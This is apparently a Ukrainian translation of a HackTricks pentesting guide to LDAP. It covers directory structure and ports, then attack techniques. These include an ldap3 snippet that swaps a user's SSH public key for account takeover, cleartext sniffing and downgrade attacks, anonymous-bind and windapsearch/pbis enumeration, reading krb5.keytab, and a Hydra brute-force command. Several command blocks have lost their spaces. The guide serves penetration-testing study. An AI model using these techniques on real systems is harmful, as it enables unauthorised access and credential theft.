Використання LDAP (Протокол легкого доступу до каталогів) в основному призначене для знаходження різних сутностей, таких як організації, особи та ресурси, такі як файли та пристрої в мережах, як публічних, так і приватних. Він пропонує спрощений підхід у порівнянні зі своїм попередником, DAP, завдяки меншій кодовій базі.
Каталоги LDAP структуровані так, щоб дозволити їх розподіл на кількох серверах, при цьому кожен сервер містить репліковану та синхронізовану версію каталогу, що називається Агентом системи каталогів (DSA). Відповідальність за обробку запитів повністю лежить на сервері LDAP, який може спілкуватися з іншими DSA за потреби, щоб надати єдину відповідь запитувачу.
Організація каталогу LDAP нагадує деревоподібну ієрархію, починаючи з кореневого каталогу вгорі. Це розгалужується на країни, які далі діляться на організації, а потім на організаційні одиниці, що представляють різні підрозділи або департаменти, нарешті досягаючи рівня окремих сутностей, включаючи як людей, так і спільні ресурси, такі як файли та принтери.
Порт за замовчуванням: 389 та 636(ldaps). Глобальний каталог (LDAP в ActiveDirectory) доступний за замовчуванням на портах 3268 та 3269 для LDAPS.
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
LDAP Data Interchange Format
LDIF (LDAP Data Interchange Format) визначає вміст каталогу як набір записів. Він також може представляти запити на оновлення (Додати, Змінити, Видалити, Перейменувати).
Рядки 5-8 визначають домен першого рівня moneycorp (moneycorp.local)
Рядки 10-16 визначають 2 організаційні одиниці: dev та sales
Рядки 18-26 створюють об'єкт домену та призначають атрибути з значеннями
Запис даних
Зверніть увагу, що якщо ви можете змінювати значення, ви могли б виконувати дійсно цікаві дії. Наприклад, уявіть, що ви можете змінити інформацію "sshPublicKey" вашого користувача або будь-якого користувача. Існує висока ймовірність, що якщо цей атрибут існує, то ssh читає публічні ключі з LDAP. Якщо ви можете змінити публічний ключ користувача, ви зможете увійти як цей користувач, навіть якщо аутентифікація за паролем не ввімкнена в ssh.
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/>>> importldap3>>> server=ldap3.Server('x.x.x.x',port=636,use_ssl=True)>>> connection=ldap3.Connection(server,'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN','PASSWORD',auto_bind=True)>>> connection.bind()True>>> connection.extend.standard.who_am_i()u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
Sniff clear text credentials
Якщо LDAP використовується без SSL, ви можете sniff credentials in plain text в мережі.
Також ви можете виконати MITM атаку в мережі між LDAP сервером і клієнтом. Тут ви можете здійснити Downgrade Attack, щоб клієнт використовував credentials in clear text для входу.
Якщо SSL використовується, ви можете спробувати зробити MITM, як згадувалося вище, але запропонувавши помилковий сертифікат. Якщо користувач його прийме, ви зможете знизити метод аутентифікації і знову побачити облікові дані.
Anonymous Access
Bypass TLS SNI check
Згідно з this writeup, просто отримавши доступ до LDAP сервера з довільним доменним ім'ям (наприклад, company.com), він зміг зв'язатися з LDAP сервісом і витягти інформацію як анонімний користувач:
LDAP анонімні зв'язки дозволяють неавтентифікованим атакам отримувати інформацію з домену, таку як повний список користувачів, груп, комп'ютерів, атрибутів облікових записів користувачів та політики паролів домену. Це спадкова конфігурація, і починаючи з Windows Server 2003, лише автентифіковані користувачі можуть ініціювати LDAP запити.
Однак адміністратори могли налаштувати конкретний додаток для дозволу анонімних зв'язків і надати більше доступу, ніж планувалося, тим самим надаючи неавтентифікованим користувачам доступ до всіх об'єктів в AD.
Дійсні облікові дані
Якщо у вас є дійсні облікові дані для входу на LDAP сервер, ви можете вивантажити всю інформацію про Domain Admin, використовуючи:
Windapsearch - це скрипт на Python, корисний для перерахунку користувачів, груп та комп'ютерів з домену Windows за допомогою LDAP запитів.
# Get computerspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--computers# Get groupspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--groups# Get userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Domain Adminspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Privileged Userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--privileged-users
ldapsearch
Перевірте нульові облікові дані або чи є ваші облікові дані дійсними:
# CREDENTIALS NOT VALID RESPONSEsearch:2result:1Operationserrortext:000004DC:LdapErr:DSID-0C090A4C,comment:Inordertoperformthisoperationasuccessfulbindmustbecompletedontheconnection.,data0,v3839
Якщо ви знайдете щось, що говорить, що "bind must be completed" означає, що облікові дані неправильні.
Щоб перевірити, чи маєте ви доступ до будь-якого пароля, ви можете використовувати grep після виконання одного з запитів:
<ldapsearchcmd...>|grep-i-A2-B2"userpas"
Будь ласка, зверніть увагу, що паролі, які ви можете знайти тут, можуть бути не справжніми...
pbis
Ви можете завантажити pbis звідси: https://github.com/BeyondTrust/pbis-open/ і зазвичай він встановлюється в /opt/pbis.
Pbis дозволяє вам легко отримувати основну інформацію:
#Read keytab file./klist-k/etc/krb5.keytab#Get known domains info./get-status./lsaget-status#Get basic metrics./get-metrics./lsaget-metrics#Get users./enum-users./lsaenum-users#Get groups./enum-groups./lsaenum-groups#Get all kind of objects./enum-objects./lsaenum-objects#Get groups of a user./list-groups-for-user<username>./lsalist-groups-for-user<username>#Get groups of each user./enum-users|grep"Name:"|sed-e"s,\\\,\\\\\\\,g"|awk'{print $2}'|whilereadname; do./list-groups-for-user"$name"; echo-e"========================\n"; done#Get users of a group./enum-members--by-name"domain admins"./lsaenum-members--by-name"domain admins"#Get users of each group./enum-groups|grep"Name:"|sed-e"s,\\\,\\\\\\\,g"|awk'{print $2}'|whilereadname; doecho"$name"; ./enum-members--by-name"$name"; echo-e"========================\n"; done#Get description of each user./adtool-asearch-user--nameCN="*"--keytab=/etc/krb5.keytab-n<Username>|grep"CN"|whilereadline; doecho"$line";./adtool--keytab=/etc/krb5.keytab-n<username>-alookup-object--dn="$line"--attr"description";echo"======================"done
Ви можете ввести john хеш пароля (з '{SSHA}' до 'structural' без додавання 'structural').
Конфігураційні файли
Загальні
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 сервер
V3.sas.oc
Microsoft Active Directory сервер
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
HackTricks Автоматичні команди
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f